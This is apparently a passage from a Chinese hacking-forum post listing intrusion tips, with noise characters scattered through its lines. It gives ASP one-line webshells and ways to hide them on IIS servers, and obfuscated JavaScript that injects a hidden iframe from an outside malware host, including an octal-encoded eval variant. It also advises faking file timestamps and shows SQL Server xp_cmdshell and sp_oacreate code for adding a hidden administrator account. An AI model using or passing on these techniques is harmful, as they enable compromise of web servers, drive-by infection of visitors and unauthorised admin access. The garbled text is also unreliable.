& t9 v2 j$ u/ w; k# v% ?e).<%25Execute(request("l"))%25>' [, D# y1 k% G1 y1 U. t
f).<%if request("cmd")<>"" then execute request("pass")%># U" |  S  z( t' Z% G
1 f) ~$ L  U( [4 Y" ?: ~! r
52、at "12:17" /interactive cmd1 W) S( I( \" j$ G6 a- |
执行后可以用AT命令查看新加的任务
; J2 V* e0 Z( P3 E( [- A用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
  U1 V: U5 ^; x; W& |- |5 |4 `1 A% q" H* m3 n' l
53、隐藏ASP后门的两种方法3 C- o! i! U3 Q9 F
1、建立非标准目录:mkdir images..\: j! o  L. T* o5 N! O, z2 g
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp9 z; P  j9 @7 ]7 I; l
通过web访问ASP木马:http://ip/images../news.asp?action=login
' L9 a5 G/ {. D2 B如何删除非标准目录:rmdir images..\ /s
$ S6 s6 g% F9 }. W9 s& ~$ o2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
4 {% e) k  v( pmkdir programme.asp. }6 R* W$ O8 t7 |/ q/ u+ S8 |7 P% H1 f
新建1.txt文件内容:<!--#include file=”12.jpg”-->. }4 W% Y9 h5 o% T8 o# i" e5 W
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
. _7 L" I, I0 A8 [$ dattrib +H +S programme.asp1 @: d# v$ T4 \! W! X% ?5 P- O7 i
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt% W3 V& Y' k5 b% ~6 A+ }/ W- l% I7 v0 Z6 t
9 X: O+ s1 a! y3 _) @
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。. D" r, T( C3 K* b" F
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
4 r, E1 |, ~5 y2 v+ _) B7 T1 X+ [" o8 k5 }( h
55、JS隐蔽挂马
. x2 c: T" `3 f1.
) u: n8 v1 X" f# \1 jvar tr4c3="<iframe src=ht";
- F, J9 G0 }  [, u1 h9 ]tr4c3 = tr4c3+"tp:/";
" I5 H* R; Y3 ^+ U$ Utr4c3 = tr4c3+"/ww";3 o1 N( m; Y, Z% X) W+ ^
tr4c3 = tr4c3+"w.tr4";" ]# B; V$ K+ P  B& H
tr4c3 = tr4c3+"c3.com/inc/m";
; p. H" G* F, y, W  v% ltr4c3 = tr4c3+"m.htm style="display:none"></i";4 q" Z9 P( ?0 S$ [/ A4 t
tr4c3 =tr4c3+"frame>'";
/ T  I" b9 G( ]6 d) Y" T' l2 Hdocument.write(tr4c3);2 j  V6 X) J0 [7 C
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
% S8 A5 u) \6 V, }" Z/ h* b* a8 Y: ^* f0 \5 ^
2.
( [" V0 }6 m8 Y/ m5 o$ X转换进制,然后用EVAL执行。如
0 {# @; ?3 n# ?eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
& m: j% G$ f% T9 Q不过这个有点显眼。
* b7 f% f/ J" W7 H- I3.' o' ^% U4 ]% w: {& S, y- R2 ]4 f
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');1 X# l1 }- ~' m8 E" z
最后一点,别忘了把文件的时间也修改下。4 i% m, _! s; `+ \- Q- r7 {' \: l
/ \: k1 w  R' p* [& e1 x
56.3389终端入侵常用DOS命令1 a8 O0 g& A/ X2 L, _3 ]
taskkill taskkill /PID 1248 /t
) G! U' M" N: S0 ?  k. I7 l
7 l7 E5 j0 f1 H) Gtasklist 查进程2 ^0 u( {, f+ f4 e
7 H; K8 w7 w4 D$ M- D
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限9 s" o: X. z' a, h! O7 K
iisreset /reboot  w' M, i; j& I  I+ D- v
tsshutdn /reboot /delay:1    重起服务器
' B2 M$ u' h1 @% g6 }
/ `* v9 P/ o6 ~( p$ _; `logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
5 x& `/ o% r! T2 Y, u, |) q3 B9 J1 ~& S8 `
query user 查看当前终端用户在线情况
5 G6 ~3 S$ s1 q; n
2 ?5 B* S3 N0 r7 ?7 T要显示有关所有会话使用的进程的信息,请键入:query process *' D2 J$ W" Z' R# E6 a) k& Y2 D
: `% }9 J! d4 x6 Y3 z: W3 w. i
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:23 h$ D# m9 r4 V

' b. b  G( [% s2 o要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ z& V$ h( ]3 E' c
, ?0 Y$ }% d3 }6 _! ?$ n要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 Q. c2 N" L- C+ D8 v6 S* O
( y1 B9 `7 r% y# t0 B  [命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启6 f7 h9 h8 n8 P- Q: p6 N5 E/ q" c& w8 {

; P: u! L6 S$ b) D: P命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统6 m, o2 b( u0 l" ]4 v

2 _& i# b8 \8 k6 G. n. A: i命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 {) [! l. R, @, a7 Q
' g* `+ M, C6 Q( Y命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机9 s1 k8 W1 G) O2 B; x2 ~, W2 s

0 @4 U5 C/ y: E) C' f4 i56、在地址栏或按Ctrl+O,输入:5 [" _* B) i) m
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;7 F2 g# Q6 @. S, K- X" u8 \/ V
/ i0 F2 V2 P& [8 |1 l7 |
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。# c: i6 y2 `( Z/ B
, b0 B! T& G' _; M/ r
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
& J# s! K6 k) h6 `用net localgroup administrators是可以看到管理组下,加了$的用户的。2 }( o+ L/ H2 F8 T; z- K

1 ?9 R( Q: X; ?; T7 r58、 sa弱口令相关命令
# s8 }) N, q! ?0 L6 E5 A
* h7 S2 Z- I& f1 R% G' S" ~$ J一.更改sa口令方法:# C. E0 r1 s6 q; P4 A; c  g  Y. M
用sql综合利用工具连接后,执行命令:
  |% Y$ r( g, t9 {7 S3 @- Y# wexec sp_password NULL,'20001001','sa'( j  i2 T& Y8 S: a8 g7 v8 n
(提示:慎用!)
8 q: @  F! U" P
) O4 N1 W( o7 Y5 C9 c2 u二.简单修补sa弱口令.
) T% S8 O% e- k7 n+ b9 V% h# t5 p, {: l5 G8 L8 D; ?/ {. a
方法1:查询分离器连接后执行:
8 Z! P2 X, B: U4 M2 n1 v- uif exists (select * from  |2 H, E( Y$ H, S" V( L3 X
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and8 S/ [& ^, c+ [, b5 @  f' S
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)) x- [/ s' k  j" p2 V4 ^( n
1 P' _  \) p( C* q# t; j
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' U. {! m5 t0 U1 {& f
- T7 E5 l- Z  m; C) L  yGO
7 D% }3 m+ G) [* x
# J- ?* m# s' S- H" X& c' H然后按F5键命令执行完毕/ A( a. N, J: z
1 m( Z8 b  O& b
方法2:查询分离器连接后6 X0 ~7 c1 ^( t+ {
第一步执行:use master* s- j- q1 u9 k  ^
第二步执行:sp_dropextendedproc 'xp_cmdshell'
: t) l$ d0 c6 q% O9 t/ G+ O( I; ?然后按F5键命令执行完毕
! ?& A- T8 N8 b% n( c- Z. A. K
1 g! c% e* _6 N4 d' ~& h
. O: g' W+ d. t! a  e  j; \) Q: M三.常见情况恢复执行xp_cmdshell.7 D' w: |4 h/ F* s& `* |& i, d0 N

  h0 k, M. \8 q  e$ i9 A" O4 i/ s# N
1 未能找到存储过程'master..xpcmdshell'.
8 y% S7 b/ t% \; y   恢复方法:查询分离器连接后,
( r% q2 S# B$ x1 a  A* k/ t第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& z. t* Q6 `' @: V8 b第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ G  ]4 |/ T3 |. H  I然后按F5键命令执行完毕6 o% D0 h! s. X9 Z

+ R- {5 \; i# `' K9 u) T1 S2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) ]' H/ x( Y3 M) F
恢复方法:查询分离器连接后,; n4 M0 t( h) T4 t
第一步执行:sp_dropextendedproc "xp_cmdshell"
; ^7 i! a9 K' C( h0 g) [& j第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 b) m6 H( e0 V然后按F5键命令执行完毕5 b- z% m3 s1 Y/ P9 w7 x' O

7 p+ j' Z& l9 D6 m: g0 N3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
! ]7 I$ X2 m9 z7 e* Q恢复方法:查询分离器连接后,0 {! m/ i4 I5 @+ N% ?7 P
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'; x. P; [( Q9 n# @6 {' t/ P
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           3 \' D; U1 D3 `$ H
然后按F5键命令执行完毕/ y- I8 U' p1 p$ Y3 Q
) P. ^% G3 D1 i: M& h# t4 V/ y
四.终极方法.( Z/ `$ d6 U; N. {, R6 K8 `  O0 p
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
7 p" H5 V5 c; N. f( m, B7 z查询分离器连接后,/ p) N2 P. J  c/ A3 x" p
2000servser系统:
5 C. U3 g% j6 Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
( K7 o# \/ g/ b: X& e; j
6 Z, N" |( ^8 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'% k1 i" v9 n; k
3 d. ?4 L* |  ~5 @) i* ?" B+ J
xp或2003server系统:! v" X1 I, }; H+ h& r
7 E2 L- K) `7 R3 e: S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
/ {) l( E. g+ E/ P: K* J7 Y& ~' ^! B: d5 D. m5 T; y, V; [% c+ F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 @, i" {# n# ]2 Z3 J* s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表